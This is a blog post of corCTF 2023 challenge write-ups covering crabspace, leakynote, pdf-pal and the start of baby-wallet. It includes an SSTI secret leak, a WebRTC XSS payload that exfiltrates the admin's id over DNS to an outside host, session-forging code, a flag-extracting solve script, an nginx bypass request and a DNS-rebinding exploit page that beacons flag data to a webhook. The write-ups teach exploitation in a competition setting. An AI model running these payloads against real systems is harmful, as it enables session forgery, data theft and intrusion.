corCTF 2023 Challenges

Sun Aug 06 2023


corCTF 2023 Challenge Writeups

Hi! corCTF 2023 just happened, so here's my blog post talking about the event. I'm thankful that the CTF went so well. The infra this year was more stable than last year's (no 0-day in our admin bot this time), and there were a lot of fun challenges that players seemed to like.

I worked a lot on the infrastructure for the event, so I'm glad there were no mishaps there. Of course, the other organizers and challenge developers also did amazing, so shoutouts to them.

I contributed 7 challs out of the total 41: 3 web, 2 blockchain, and 2 misc. Personally, I'm a bit torn about this year's web, since I think last year's web was better than this year's. Sadly, I didn't really have enough time to write challenges this year, so a lot of my stuff was pretty rushed.

I did contribute 3 web, but pdf-pal was actually a challenge from corCTF 2022 that got dropped because of infra problems, and I wrote leakynote the day of the CTF. I'm at the point in my challenge writing career where I feel like I've written all the challenges I would have loved to see as a player myself. But, I still think that I have some funny ideas left...

Anyway, enough rambling, here are the writeups to my challenges.


crabspace

I'm thankful that I was spared this year from writing baby web challenges. So, the "easiest" web challenge I wrote for the event was definitely not easy.

crabspace was a Rust (😍) XSS web challenge that was quite oniony. The description was flavortext based on Elon Musk's renaming of Twitter to X (???), and it gave you links to an instancer (so your exploit could probably break the server), and an admin bot (for XSS).

Starting the instance, we see that it's a basic platform where you can create a "space", and then view it rendered as HTML.

The flag is in the admin's password, so let's work towards that.

Trying out HTML tags in our space, they seem to work! Okay, let's try some JavaScript payload! The classic <script>alert(1);</script> doesn't work, but <script>console.log(1);</script> does...

Checking the template, we see why this is the case:

<iframe sandbox="allow-scripts" srcdoc="<link rel='stylesheet' href='/public/axist.min.css' />{{ space }}" class="space"></iframe>

Our HTML code is output into the srcdoc attribute of an iframe with sandbox="allow-scripts". Basically, we have full JavaScript execution, but in a sandboxed iframe with a null origin. This means that our XSS doesn't let us access the crabspace domain. Damn.

But checking the route handler for space, routes/space.rs, we see this code:

async fn space(
    Extension(tera): Extension<Tera>,
    Path(id): Path<Uuid>,
    mut ctx: Context,
) -> AppResult<Response> {
    Ok(match USERS.get(&id) {
        Some(user) => {
            ctx.tera.insert(
                "space",
                &Tera::one_off(&user.space, &ctx.tera, true)
                    .unwrap_or_else(|_| user.space.clone()),
            );
            ctx.tera.insert("id", &id);
            utils::render(tera, "space.html", ctx.tera).into_response()
        }
        None => {
            ctx.sess
                .insert("error", "Could not find the space for that user")?;
            Redirect::to("/").into_response()
        }
    })
}

Sorry if you can't read Rust. But basically, we see that the {{ space }} variable is actually the result of Tera::one_off(&user.space, &ctx.tera, true).unwrap_or_else(|_| user.space.clone()).

From the Tera docs, we see that Tera::one_off renders a one-off template, for example, one coming from a user. This is essentially SSTI, since we pass user input to this template engine. The unwrap_or_else part just handles the error case if the template fails to render.
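Tera is Rust-specific, but this class of bug is language-agnostic. As a rough Python analogue (illustrative only, not the challenge code), formatting a user-controlled string against a context object lets the user pull values out of that context:

```python
class User:
    """Stand-in context object with a sensitive field."""
    password = "hunter2"

# The "template" is attacker-controlled, like user.space in crabspace.
user_space = "{user.password}"

# Rendering user input AS the template (rather than as data) is the bug.
print(user_space.format(user=User()))  # prints: hunter2
```

The fix in both languages is the same: user input should only ever be template *data*, never the template itself.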

By the way, this is why the challenge needed to be instanced. Using this SSTI, while you couldn't get RCE, you could DoS the server by using control structures to cause it to loop for a long time.

Okay, so what can we do with this SSTI? Well, like I mentioned earlier, you can't get RCE - there's no feature in the docs that allows you to do that. But the get_env built-in function looks interesting!

In the provided Dockerfile, we have this line:

ENV SECRET secretsecretsecretsecretsecretsecretsecretsecretsecretsecretsecr

And in the main.rs code, we have this:

#[tokio::main]
async fn main() {
    let store = CookieStore::new();
    let secret: [u8; 64] = std::env::var("SECRET")
        .map(|p| p.as_bytes().try_into().expect("SECRET must be 64 bytes"))
        .unwrap_or_else(|_| [(); 64].map(|_| rand::thread_rng().gen()));
    let session_layer = SessionLayer::new(store, &secret).with_secure(false);
    // ...

So, the session store used by the application is a CookieStore, where the secret used comes from the SECRET environment variable! So, if we can leak the SECRET env var, we could sign our own sessions with arbitrary data (since the complete session data is stored in the cookie).
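As a sketch of why leaking SECRET is game over: signing the session cookie is just an HMAC over the cookie value. This is a Python illustration, not the server's code; it assumes the cookie crate's usual key split, where the first 32 bytes of the 64-byte master key are the signing half (worth verifying against your exact library versions).

```python
import base64
import hashlib
import hmac

def sign_cookie(master_key: bytes, cookie_value: str) -> str:
    # Assumption: like the cookie crate's Key::from, the first 32 bytes
    # of the 64-byte master key act as the HMAC-SHA256 signing key.
    signing_key = master_key[:32]
    digest = hmac.new(signing_key, cookie_value.encode(), hashlib.sha256).digest()
    # async_session-style cookies prepend the 44-char base64 digest
    # to the serialized session value.
    return base64.b64encode(digest).decode() + cookie_value

forged = sign_cookie(b"x" * 64, "forged-session-data")
print(forged[:44], forged[44:])
```

Anyone holding the master key can mint a valid cookie for arbitrary session data, which is exactly what we'll do.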

Okay, let's do this. Following Tera's format, we can leak the secret with {{ get_env(name="SECRET") }}:

Nice! So the secret is bhtfvrbya2el1aj9j9yc1khanujw5sy2cnsfnixv7pe9b0ayuyki6o3ckvzzpe6m. Looking at the code, we see a lot of features reserved for admins only. Since we can't use our XSS to mess with the crabspace domain as the admin, we need to find a way to become the admin ourselves.

Using our leaked secret, we can create arbitrary sessions. Let's look at the authorization middleware:

#[async_trait]
impl<S> FromRequestParts<S> for Context
where
    S: Send + Sync,
{
    type Rejection = Redirect;

    async fn from_request_parts(parts: &mut Parts, state: &S) -> Result<Self, Self::Rejection> {
        let Extension(session_handle): Extension<SessionHandle> =
            Extension::from_request_parts(parts, state)
                .await
                .expect("Session extension missing. Is the session layer installed?");
        let mut sess = session_handle.write_owned().await;

        let mut tera = tera::Context::new();
        if let Some(err) = sess.get::<String>("error") {
            sess.remove("error");
            tera.insert("error", &err);
        }
        if let Some(info) = sess.get::<String>("info") {
            sess.remove("info");
            tera.insert("info", &info);
        }

        let mut user: Option<User> = None;
        if let Some(id) = sess.get::<Uuid>("id") {
            user = USERS.get(&id).map(|v| User {
                pass: "".to_string(),
                ..v.clone()
            });
            tera.insert("user", &user);
        }

        Ok(Context { tera, sess, user })
    }
}

Okay, so at the top of the function, it gets the Session extension. Then at the bottom, it tries to get "id" from the session. If it exists, it runs USERS.get(&id), and sets that to our user. Okay, what is USERS? In db.rs, we see this:

#[derive(Debug, Serialize, Clone)]
pub struct User {
    pub id: Uuid,
    pub name: String,
    pub pass: String,
    pub following: Vec<Uuid>,
    pub followers: Vec<Uuid>,
    pub space: String,
}

pub static USERS: Lazy<DashMap<Uuid, User>> = Lazy::new(DashMap::new);
pub static NAMES: Lazy<DashMap<String, Uuid>> = Lazy::new(DashMap::new);

Okay, so there's a User struct, holding an id which is a Uuid (specifically Uuidv4). Then, the USERS variable is a DashMap (read: HashMap) of user ids to users, and NAMES is a DashMap of usernames to user ids. Interesting.

So, if we can leak the admin's id, we can forge a session as them and become admin! But, how do we leak the admin's session? Well, we have an XSS, and we haven't used it yet...

Let's look at the space.rs code again:

async fn space(
    Extension(tera): Extension<Tera>,
    Path(id): Path<Uuid>,
    mut ctx: Context,
) -> AppResult<Response> {
    Ok(match USERS.get(&id) {
        Some(user) => {
            ctx.tera.insert(
                "space",
                &Tera::one_off(&user.space, &ctx.tera, true)
                    .unwrap_or_else(|_| user.space.clone()),
            );
            ctx.tera.insert("id", &id);
            utils::render(tera, "space.html", ctx.tera).into_response()
        }
        None => {
            ctx.sess
                .insert("error", "Could not find the space for that user")?;
            Redirect::to("/").into_response()
        }
    })
}

In the line Tera::one_off(&user.space, &ctx.tera, true), the first argument is the user template, the second argument is the context, and the last parameter is whether we want to autoescape. Okay, so &ctx.tera is our context, but what does that really contain?

Well, from the Tera docs:

A magical variable is available in every template if you want to print the current context: __tera_context.

So, what does {{ __tera_context }} give us?

We see the id of the current user! Sadly, the pass field is cleared. Actually, in the session middleware code above, we can see exactly where this comes from:

user = USERS.get(&id).map(|v| User {
    pass: "".to_string(),
    ..v.clone()
});
tera.insert("user", &user);

Okay, so then doing {{ user.id }}, our SSTI places the current user's id. So, if we have {{ user.id }} in our space, and the admin visits our space, their id will be loaded! Then, we just have to find some way to exfiltrate their id!

Sadly, this is a little difficult. Let's take a look at the security middleware:

pub async fn security<B>(req: Request<B>, next: Next<B>) -> AppResult<Response> {
    let mut res = next.run(req).await;
    let headers = res.headers_mut();
    headers.insert(
        "Content-Security-Policy",
        HeaderValue::try_from(
            [
                "default-src 'none'",
                "style-src 'self'",
                "script-src 'unsafe-inline'",
                "frame-ancestors 'none'",
            ]
            .join("; "),
        )?,
    );
    headers.insert(
        "Cross-Origin-Opener-Policy",
        HeaderValue::from_static("same-origin"),
    );
    headers.insert("X-Frame-Options", HeaderValue::from_static("DENY"));
    headers.insert("Cache-Control", HeaderValue::from_static("no-cache, no-store"));
    Ok(res)
}

So, there's a CSP of default-src 'none'; style-src 'self'; script-src 'unsafe-inline'; frame-ancestors 'none', there's a Cross-Origin-Opener-Policy: same-origin header, a X-Frame-Options: DENY header, and a Cache-Control: no-cache, no-store header.

This makes it very hard to leak anything. Since default-src is 'none', frame-src is 'none' too, so we can't navigate the space frame anywhere. Since the space frame is sandboxed, we can't create a popup via window.open, nor access anything in the parent frame. And since Cross-Origin-Opener-Policy: same-origin is set, we can't use window.parent.opener to access a cross-origin opener. How fun.

Well, this is the same exact situation as corCTF 2021's challenge web/msgme, and it's the perfect time to use WebRTC! I know of a few bypasses that can leak data no matter what the CSP is, but DNS prefetching doesn't work on headless: true, and the others are secret :^).

Anyway, in web/msgme the WebRTC payload was really large, and the space has a maximum length of 200 characters. So, the method used there won't directly work. But, messing around with it, you will find that it can leak stuff through DNS. Here's my WebRTC payload:

<script>pc = new RTCPeerConnection({"iceServers":[{"urls":["stun:{{user.id}}." + DNS_LEAK]}]});pc.createOffer({offerToReceiveAudio:1}).then(o=>pc.setLocalDescription(o));</script>

You can probably get it much shorter than this. For DNS_LEAK I used the wonderful mess with dns site, which you should totally check out.
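If you'd rather catch the leak on your own nameserver instead of a service like mess with dns, a minimal sketch (hypothetical helper, not part of my solve) that pulls the queried name out of a raw DNS packet looks like this:

```python
import socket

def qname(packet: bytes) -> str:
    # The DNS header is 12 bytes; the question name follows as
    # length-prefixed labels terminated by a zero byte.
    i, labels = 12, []
    while packet[i]:
        n = packet[i]
        labels.append(packet[i + 1:i + 1 + n].decode())
        i += 1 + n
    return ".".join(labels)

def listen(host="0.0.0.0", port=53):
    # Print every queried name; the leaked admin id arrives as the
    # first label of the STUN hostname from the WebRTC payload.
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock.bind((host, port))
    while True:
        data, _ = sock.recvfrom(512)
        print(qname(data))
```

Run it on a host whose domain's NS records point at it, and the admin's id shows up in the query log.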

Okay, so with this we can leak the admin's id! Now we need to write some code to forge the session. Since it uses Bincode to encode stuff, it's easier to write this in Rust. Here's my payload:

use async_session::{CookieStore, SessionStore};
use async_session::{
    base64,
    hmac::{Hmac, Mac, NewMac},
    sha2::Sha256,
};
use axum_extra::extract::cookie::Key;

const BASE64_DIGEST_LEN: usize = 44;

#[tokio::main]
async fn main() {
    let store = CookieStore::new();

    let mut secret = String::new();
    std::io::stdin().read_line(&mut secret).unwrap();
    let mut sid = String::new();
    std::io::stdin().read_line(&mut sid).unwrap();
    let mut target_id = String::new();
    std::io::stdin().read_line(&mut target_id).unwrap();

    let (_, value) = sid.split_at(BASE64_DIGEST_LEN);
    let mut session = store.load_session(value.trim().to_string()).await.unwrap().unwrap();
    session.insert("id", target_id.trim()).unwrap();
    let value = store.store_session(session).await.unwrap().unwrap();

    let key = Key::from(secret.trim().as_bytes());
    let mut mac = Hmac::<Sha256>::new_from_slice(key.signing()).expect("good key");
    mac.update(value.as_bytes());

    let mut new_value = base64::encode(mac.finalize().into_bytes());
    new_value.push_str(&value);
    println!("{new_value}");
}

With this, we can become admin. Now, the admin account can't edit their space or follow any user (remnants from when this was going to be a non-instanced challenge), but they have access to an admin panel, which they can see on any user (besides the admin).

The admin panel shows information about the user, specifically, fields in the UserView struct. Here it is:

#[derive(Serialize)]
struct UserView {
    id: Uuid,
    name: String,
    following: Vec<User>,
    followers: Vec<User>,
    space: String,
}

impl From<User> for UserView {
    fn from(u: User) -> Self {
        UserView {
            id: u.id,
            name: u.name,
            following: u
                .following
                .iter()
                .filter_map(|f| USERS.get(f).map(|f| f.clone()))
                .collect(),
            followers: u
                .followers
                .iter()
                .filter_map(|f| USERS.get(f).map(|f| f.clone()))
                .collect(),
            space: u.space,
        }
    }
}

So, the UserView struct has fields id, name, following, followers, and space. Looking at the template, we see that the following and followers vectors allow custom sorting via a URL argument. This would be fine and all, but the above struct actually has a terrible bug in it!

The following and followers fields should be Vec<UserView>, not Vec<User>! The only difference between a User and a UserView is that a User struct has a password field. Since the list of follow(ing/ers) is a list of Users, the context passed to the template actually contains the password of each follow(er).

While their password is not shown directly, it can be indirectly leaked through sorting, via ?sort=pass. So, if we follow the admin and a bunch of other accounts, we can sort by passwords, leaking the admin's password, which is the flag!
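As a self-contained illustration of the character-by-character recovery (with a simulated oracle standing in for the real HTTP calls), the idea works like this: register a throwaway account whose password is our current guess, sort the followers by password, and see whether the admin lands before or after it.

```python
import string

# Flag-format alphabet, sorted; '}' (0x7d) conveniently sorts last.
ALPHABET = sorted(string.ascii_lowercase + string.digits + "_}")

def oracle(secret, query):
    # Simulates ?sort=pass on the admin panel: True when the admin's
    # password sorts at or before our freshly-registered query password.
    return secret <= query

def leak(secret, known="corctf{"):
    while not known.endswith("}"):
        prev = None
        for c in ALPHABET:
            if oracle(secret, known + c):
                # First query that sorts at/after the secret: either we
                # hit the closing brace exactly, or the previous
                # candidate carried the correct next character.
                known = known + c if c == "}" else prev
                break
            prev = known + c
    return known

print(leak("corctf{b3tter_name_th4n_x}"))
```

The real script additionally pads the alphabet with sentinel characters to cover edge cases at the top of the character range; each while-iteration costs one registered account plus one sorted admin-panel fetch per alphabet character.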

Here's my solve script:

from pwn import *
import requests
import string
import random
import sys
import re

context.arch = 'amd64'
context.log_level = 'CRITICAL'

TARGET = "https://web-crabspace-crabspace-f44db99d2c2f302d.be.ax"
ADMIN_ID = "d2361b7a-0b07-4f72-937d-880aa3b3f45b"
DNS_LEAK = "lilac201.messwithdns.com"
KNOWN = "corctf{"

LEAK_PAYLOAD = """<script>pc = new RTCPeerConnection({"iceServers":[{"urls":["stun:{{user.id}}.""" + DNS_LEAK + """"]}]});pc.createOffer({offerToReceiveAudio:1}).then(o=>pc.setLocalDescription(o));</script>"""

UUID_PATTERN = r'"\/space\/(.*?)"'
ORDER_PATTERN = r'<tr>\n <td>.*?</td>\n <td>(.*?)</td>'
SPACE_PATTERN = r'axist\.min\.css\' \/>(.*?)"'

ALPHABET = string.ascii_lowercase + string.digits + "_}"
ALPHABET = ''.join(sorted([c for c in ALPHABET])) + "~~"

def randstr():
    alphabet = list(string.ascii_lowercase + string.digits)
    return ''.join([random.choice(alphabet) for _ in range(32)])

def forge(secret, uuid):
    assert len(secret) == 64
    s, _ = register()
    base_sid = s.cookies.get("sid")
    p = process("./target/release/crabspace-sol")
    p.sendline(secret.encode())
    p.sendline(base_sid.encode())
    p.sendline(uuid.encode())
    new_cookie = p.readline()
    return new_cookie.decode().strip()

def register(password=None):
    if not password:
        password = randstr()
    assert len(password) >= 7
    s = requests.Session()
    r = s.post(f"{TARGET}/api/register", data={"name": randstr(), "pass": password})
    assert r.status_code == 200
    return s, re.findall(UUID_PATTERN, r.text)[0]

def set_space(s, space):
    r = s.post(f"{TARGET}/api/space", data={"space": space})
    assert r.status_code == 200

def get_space(id):
    r = requests.get(f"{TARGET}/space/{id}")
    assert r.status_code == 200
    return re.findall(SPACE_PATTERN, r.text)[0]

def follow(s, id):
    r = s.post(f"{TARGET}/api/follow", data={"id": id})
    assert r.status_code == 200

def get_order(admin, target_id):
    r = admin.get(f"{TARGET}/admin/{target_id}?sort=pass")
    return re.findall(ORDER_PATTERN, r.text)

def get_user(sid):
    s, _ = register()
    for c in s.cookies:
        c.value = sid
    return s

def oracle(admin, target, target_id, query):
    _, query_id = register(query)
    follow(target, query_id)
    order = get_order(admin, target_id)
    assert len(order) == 2
    res = order[0] == 'admin'
    follow(target, query_id)
    return res

secret_leaker, secret_leaker_id = register()
set_space(secret_leaker, '{{ get_env(name="SECRET") }}')
SECRET = get_space(secret_leaker_id)
print(f"[!] Found secret: {SECRET}")

if not ADMIN_ID:
    rtc, rtc_id = register()
    set_space(rtc, LEAK_PAYLOAD)
    print(f"[!] Send this URL to the admin: {TARGET}/space/{rtc_id}")
    print(f"[!] Once you do so, check DNS_LEAK to find the admin's id")
    ADMIN_ID = input("[ID] > ")

print(f"[!] Found admin id: {ADMIN_ID}")

admin_sid = forge(SECRET, ADMIN_ID)
admin = get_user(admin_sid)
if "Login" in admin.get(TARGET).text:
    print("[!] The saved ADMIN_ID variable is invalid, please set it again")
    sys.exit(1)
else:
    print("[!] Logged in as admin successfully")

target, target_id = register()
follow(target, ADMIN_ID)
assert get_order(admin, target_id) == ['admin']
print("[!] Followed admin account as target")

print("[!] Starting search...")
while not KNOWN.endswith("}"):
    prev = ""
    for c in ALPHABET:
        if oracle(admin, target, target_id, KNOWN + c):
            if c == "}":
                KNOWN += c
                break
            KNOWN = prev
            print(f"[FLAG] {KNOWN}")
            break
        prev = KNOWN + c

print(f"[!] Found flag: {KNOWN}")

Quite long, but it does it all automatically. With that, we can get the flag:

corctf{b3tter_name_th4n_x}

leakynote

From the title, you can guess that this is an XS-Leak challenge. It's written in PHP (🤮), served with nginx.

Larry (EhhThing) was my co-author for this challenge. He discovered the nginx quirk used in this challenge. I wrote the challenge around that, and found an XS-Leak to solve. As I said before, I wrote this challenge the day of the CTF, but what people don't know is that I actually only created a working solve script 2 hours before the CTF 🙃.

Okay, so the challenge is very similar to crabspace, except this time there's no JavaScript execution. We can create our own notes with arbitrary HTML, but they're subject to a strict CSP: script-src 'none'; object-src 'none'; frame-ancestors 'none';.

There's a search functionality, where you can search in your own notes. If there are no notes found with that query, it returns 404, usually something that we can use to leak. But, since there is an object-src 'none', we can't use the HTML-only <object> 404 leak. And since the cookies are SameSite=lax by default, we can't use the probeError script from the XS-Leaks wiki. We can't leak anything with this alone.

The first step is realizing the quirk with the CSP. The CSP is added by nginx, in nginx.conf:

server {
    listen 80;
    server_name _;
    index index.php;
    root /www;

    location / {
        try_files $uri $uri/ /index.php?$query_string;
        add_header Content-Security-Policy "script-src 'none'; object-src 'none'; frame-ancestors 'none';";

        location ~ \.php$ {
            try_files $uri =404;
            fastcgi_pass unix:/run/php-fpm.sock;
            fastcgi_index index.php;
            fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name;
            include fastcgi_params;
        }
    }
}

What Larry mentioned to me is that add_header only adds the header to successful HTTP responses (unless the always keyword is specified, which it isn't here), so a 404 response would be missing the CSP header entirely. Quirky.

So what does that let us do? Well, the search page has no HTML injection, so the removal of script-src and object-src are useless to us. But removing frame-ancestors is interesting...

This means that with our HTML injection, we can iframe the search page.

If the search returned some results, it wouldn't be a 404, so it wouldn't remove the CSP, so it would still have frame-ancestors, so the iframing would fail.

If the search didn't return anything, it would be a 404, so it would remove the CSP, so it wouldn't have frame-ancestors, so the iframing would work!

This is an oracle that we can use. There were multiple solutions from this point, but I'll go over mine. If you <iframe> the search page and no results are found, it will iframe successfully, and load the /search page. This will cause some extra CSS files to load, causing some network congestion.

Now, this is exactly the same as safelist from SekaiCTF 2022! In that solution I used the connection pool leak. But others solved it more simply, by just timing how long fetches take, so I did the same thing here. If you want to see the other solutions, you should check out the #web channel in our disCoRd.

With this oracle, we can get the flag!

corctf{leakrgod}

Truly, this tweet from Ark puts it best - anything can be an oracle if you really try hard enough.

pdf-pal

I wrote pdf-pal last year, and it was an okay challenge. The first step involved an nginx-gunicorn parser differential, and our infrastructure last year could not handle that for some reason. This year, I fixed that problem, and made the challenge much harder. But, I also introduced another bug in the challenge, adding an unintended solution and making it much easier.

Sadly, very little testing goes on for corCTF, mostly because everyone writes challenges that are so esoteric that no one wants to test anyone else's challenges, so this flew under the radar. Oops!

pdf-pal is a simple tool that lets you generate PDFs from URLs, and also rename them. But uh, none of those features are enabled by default.

Checking the nginx config, we see why:

location / {
    proxy_pass http://localhost:7777;

    location ^~ /generate {
        allow 127.0.0.1;
        deny all;
    }

    location ^~ /rename {
        allow 127.0.0.1;
        deny all;
    }
}

So, both /generate and /rename are blocked by the nginx reverse proxy, and only allowed by localhost. The first step is finding a bypass for this.

There was a hint released 24 hours in:

24 hr hint drop: the first step is to find a gunicorn and nginx parser differential... i may have installed nginx from a package manager, but that doesn't mean its up to date 🙃

Hm... Well, this technique was found by some friends in my team DiceGang during CSAW 2021's web challenge, gatekeeping. Essentially, there's a parser differential between gunicorn and nginx that allows you to request these URL paths. Here's my script:

import socket
import ssl

HOST = "web-pdf-pal-pdf-pal-e31d2703c0a0d142.be.ax"
PORT = 8080

def generate(url):
    payload = f"url={url}"
    data = f"""POST /generate{chr(9)}HTTP/1.1/../../ HTTP/1.1
Host: {HOST}:7777
Content-Length: {len(payload)}
Content-Type: application/x-www-form-urlencoded

{payload}
"""
    base_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        s = ssl.create_default_context().wrap_socket(base_sock, server_hostname=HOST)
        s.connect((HOST, PORT))
    except:
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect((HOST, PORT))
    print(data)
    s.sendall(data.encode())
    resp = s.recv(1024)
    return resp.decode()

With this, we can now generate and rename any files that we want. The flag is at /flag.txt, so can we just generate a PDF of that file? Well, no. Checking the source code, we see a blacklist:

def blacklist(text, extra=()):
    banned = ["flag", "txt", "root", "output", "pdf-gen"] + list(extra)
    return any(item in text or item in unquote(text) for item in banned)

So this won't work. I think it's now a good time to explain the architecture of the application.

There are three services running in the container:

  1. a NodeJS Fastify server that runs Puppeteer to generate the PDF (port 7778)
  2. a Python Flask + Gunicorn server that serves as the front-end for the application (port 7777)
  3. nginx (port 80)

The first two services (7777 and 7778) listen only on localhost and are not exposed publicly. nginx is exposed, but only reverse proxies port 7777.

The blacklist functionality only exists on the front-end Python server. So, if we can send a request directly to :7778, we can generate a PDF of any location that we want! And we can do just that.

To generate a PDF of a site, Puppeteer (the same software running the XSS admin bots) navigates to your site, then generates the PDF. This means that JavaScript will also run, and since the admin bot is in the container, it will be on localhost.

That means that generating a PDF of a non-blacklisted site that includes JavaScript to fetch to :7778 will be able to generate a PDF for us! This lets us generate a PDF of /flag.txt.

But there's one issue - the PDF is placed at a random location, a uuid v4. We won't know where the PDF is. And since the PDF is not being generated by the front-end application, it won't be displayed there either. The response to the fetch to :7778 will contain the file location, but we won't be able to read that because of the Same Origin Policy... right?

Well, no! Enter: DNS rebinding. I won't explain this in too much detail, since I already used this technique in corCTF 2021, specifically, the saasme challenge. Check out singularity if you want a reference implementation.

But the general idea is that we use multiple A records, one with the IP for our server, then one for 0.0.0.0. When the admin bot goes to our domain, it resolves the IP for our server and loads a custom payload page. Then, we kill our server. Then, when it attempts to load a new resource on the same-origin, it can't access it at our IP (since our server is dead), and so falls back to 0.0.0.0, reading a localhost resource. Since this is same-origin, we can read the response.
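To make this concrete, here's a rough sketch of the DNS answer such a rebinding server hands back: the attacker's A record first, 0.0.0.0 as the fallback. It's hand-rolled and simplified (it assumes the query carries exactly one question and no EDNS/OPT records); 203.0.113.7 is a placeholder attacker IP.

```python
import socket
import struct

def rebind_response(query: bytes, ips=("203.0.113.7", "0.0.0.0")) -> bytes:
    # Build a DNS response with multiple A records for one name:
    # the browser tries the first IP, and falls back to the second
    # once our server stops responding (multiple-answers rebinding).
    txid = query[:2]
    # Flags 0x8180: standard response, recursion desired + available.
    header = txid + struct.pack(">HHHHH", 0x8180, 1, len(ips), 0, 0)
    question = query[12:]  # echo the question section back verbatim
    answers = b""
    for ip in ips:
        # Name pointer 0xC00C -> offset 12 (the question's name),
        # type A (1), class IN (1), TTL 60, rdlength 4, then the IP.
        answers += struct.pack(">HHHIH", 0xC00C, 1, 1, 60, 4)
        answers += socket.inet_aton(ip)
    return header + question + answers
```

A real tool like singularity handles the messy parts (EDNS, rebinding strategies, timing), but the wire format above is the core of the trick.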

const express = require("express");
const app = express();

app.get("/", (req, res) => {
    res.sendFile("exploit.html", { root: "." });
});

app.get("/kill", (req, res) => {
    console.log("killed!");
    process.exit();
});

app.listen(7778, () => console.log("listening on 7778"));
<script>
let log = (id, data) => {
    navigator.sendBeacon("//WEBHOOK//?" + id, data);
};
let pwn = async () => {
    log("running");
    try {
        let data = await (await fetch("/generate", {
            method: "POST",
            headers: { "Content-Type": "application/json" },
            body: JSON.stringify({ url: "file:///flag.txt" })
        })).text();
        log("rebind", btoa(encodeURIComponent(data)));
    } catch(e) {
        log("rebind_error", e.message);
    }
};
fetch(location.origin + "/kill");
setTimeout(pwn, 4000);
</script>
<img src="http://server.brycec.me:3001/api/delay/60" />
<img src="http://server.brycec.me:3001/api/delay/60" />
<img src="http://server.brycec.me:3001/api/delay/60" />
<img src="http://server.brycec.me:3001/api/delay/60" />
<img src="http://server.brycec.me:3001/api/delay/60" />
<img src="http://server.brycec.me:3001/api/delay/60" />
<img src="http://server.brycec.me:3001/api/delay/60" />
<img src="http://server.brycec.me:3001/api/delay/60" />

Make sure to also set up your DNS correctly to use these scripts.

So, using multiple answers DNS rebinding we can read a cross-origin response. You might be wondering why this doesn't completely make the SOP useless - since the domain is different, cookies and localStorage are not shared with the real domain.

But still, there's a problem. There's a queue system implemented for PDF generation:

let generating = false;
setInterval(async () => {
    if (generating || queue.length === 0) return;
    const { url, resolve, reject } = queue.shift();
    console.log(`Navigating to: ${url}`);
    try {
        generating = true;
        const pdf = await pdfbot.generate(url);
        generating = false;
        resolve({ pdf, hash: sha256(await fsp.readFile(`./output/${pdf}`)) });
    } catch (err) {
        console.log(err);
        generating = false;
        reject(err);
    }
}, 500);

So, it only generates one PDF at a time, which means only one browser session will be active at a time. This is a problem!

Think about how this would work:

  1. we start generating a PDF in browser instance A
  2. browser instance A navigates to our exploit site
  3. browser instance A makes a request to /generate on 7778 with /flag.txt
  4. this can't start since there's a queue, so browser instance A has to die first
  5. once browser instance A dies, we start generating a PDF in browser instance B
  6. ...

So, we won't be able to use browser instance A to read the response from browser instance B! Well, take a look at the PDF generation code directly:

const puppeteer = require("puppeteer");
const crypto = require("crypto");

const generate = async (url) => {
    const browser = await puppeteer.launch({
        headless: true,
        args: [
            '--no-sandbox',
            '--disable-setuid-sandbox',
            '--js-flags=--noexpose_wasm,--jitless' // this is a web chall :>
        ],
        dumpio: true,
        pipe: true, // lmao no
        executablePath: process.env.PUPPETEER_EXEC_PATH
    });
    const page = await browser.newPage();
    await page.goto(url, { waitUntil: "networkidle0" });
    const pdf = `${crypto.randomUUID()}.pdf`;
    await page.pdf({ path: `./output/${pdf}` });
    await browser.close();
    return pdf;
};

module.exports = { generate };

Notice an issue here? It's very subtle, but there's no error handling code! If any one of these lines errors, the browser will stay active. The queue implementation will know something went wrong, but without access to the browser instance, it can't kill it.

So, if we trigger an error during our DNS rebinding attempt, our browser instance won't be killed, letting it outlive the instance generating the PDF so we can read the response. Causing the error is easy: just load resources that take longer than 30 seconds (the default navigation timeout), since page.goto waits for networkidle0 (in other words, for all resources to finish loading).

Okay, now, we have the file location of a PDF generated from /flag.txt. I'll just go over the solution that both teams used at this point, since it's a lot easier than mine.

If you check the source for the front-end application, you'll see that it only renders PDFs from the list of PDFs it knows about, so we can't use it to read our flag PDF.

But interestingly, when the front-end sends over a PDF, it uses this code:

@app.route("/view/<requested_file>")
def view(requested_file):
    for file in files:
        if file["pdf"] == requested_file:
            path = os.path.abspath("/pdf-gen/output/" + file["pdf"])
            if not path.startswith("/pdf-gen/output/"):
                return abort(400, ":lemonthink:")
            with open(path, "rb") as pdf:
                data = pdf.read()
            sha256 = hashlib.sha256(data).hexdigest()
            if sha256 != file["hash"]:
                return abort(400, ":lemonthink:")
            return send_file(io.BytesIO(data), attachment_filename=file["pdf"], mimetype='application/pdf')
    return abort(404)

Why is this interesting? Well, it serves a PDF from disk, opening it using open. But, for some reason, the internal PDF generating back-end has this code:

fastify.register(require('@fastify/static'), {
    root: path.join(__dirname, 'output'),
});

So, the back-end has an unused Fastify middleware to serve PDFs itself! That means that by accessing :7778/<pdfname.pdf>, we can load the PDF. From there, we can just use the same DNS rebinding technique to exfiltrate the flag PDF and get the flag.

The intended solution was just to use drive-by-downloading and the rename function to get an HTML file in this folder, then just fetch the flag. But this wasn't necessary.

corctf{y0u_are_a_pdf_pr0digy!!!}

baby-wallet

baby-wallet was the first blockchain challenge in the CTF, and it was an easy Ethereum challenge.

Provided were two smart contracts, Setup.sol and BabyWallet.sol. Since they're both short, I'll just post them here:

pragma solidity ^0.8.17;

import "./BabyWallet.sol";

contract Setup {
    BabyWallet public wallet;

    constructor() payable {
        require(msg.value == 100 ether, "requires 100 ether");
        wallet = new BabyWallet();
        payable(address(wallet)).transfer(msg.value);
    }

    function isSolved() public view returns (bool) {
        return address(wallet).balance == 0 ether;
    }
}
pragma solidity ^0.8.17;

contract BabyWallet {
    mapping(address => uint256) public balances;
    mapping(address => mapping(address => uint256)) public allowances;

    function deposit() public payable {
        balances[msg.sender] += msg.value;
    }

    function withdraw(uint256 amt) public {
        require(balances[msg.sender] >= amt, "You can't withdraw that much");
        balances[msg.sender] -= amt;
        (bool success, ) = msg.sender.call{value: amt}("");
        require(success, "Failed to withdraw that amount");
    }

    function approve(address recipient, uint256 amt) public {
        allowances[msg.sender][recipient] += amt;
    }

    function transfer(address recipient, uint256 amt) public {
        require(balances[msg.sender] >= amt, "You can't transfer that much");
        balances[msg.sender] -= amt;
        balances[recipient] += amt;
    }

